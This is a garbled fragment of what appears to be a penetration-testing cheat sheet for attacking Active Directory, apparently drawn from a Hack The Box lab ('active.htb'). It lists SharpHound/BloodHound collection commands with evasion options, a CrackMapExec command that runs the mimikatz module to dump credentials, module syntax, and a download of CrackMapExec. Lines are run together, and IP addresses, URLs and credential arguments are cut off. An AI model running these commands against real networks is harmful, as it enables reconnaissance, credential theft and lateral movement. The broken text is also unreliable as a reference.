


\ SharpHound.exe -c all ,GPOLocalGroup -outputdirectory C:\Windows\Temp -randomizefilenames -prettyjson -nosavecache -encryptzip -collectallproperties -throttle 10000 -jitter 23 # or run the collector on the machine using Powershell # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.ps1 Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public \ SharpHound.exe -c all -d active.htb -LdapUsername -LdapPassword -domaincontroller 10.10. \ SharpHound.exe -c all -LdapUsername -LdapPassword -JSONFolder \ SharpHound.exe -EncryptZip -ZipFilename export.zip \ SharpHound.exe -c all -d active.htb -SearchForest # run the collector on the machine using SharpHound.exe # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe Root cme mimikatz -server http -server -port 80 14.0 / 24 -u user -p 'Password ' -local -auth -M mimikatz Root cme smb -M name_module -o VAR = DATA Root wget https: // /byt3bl33d3r /CrackMapExec /releases /download /v5. # use the latest release, CME is now a binary packaged will all its dependencies Impersonating Office 365 Users on Azure AD Connect.

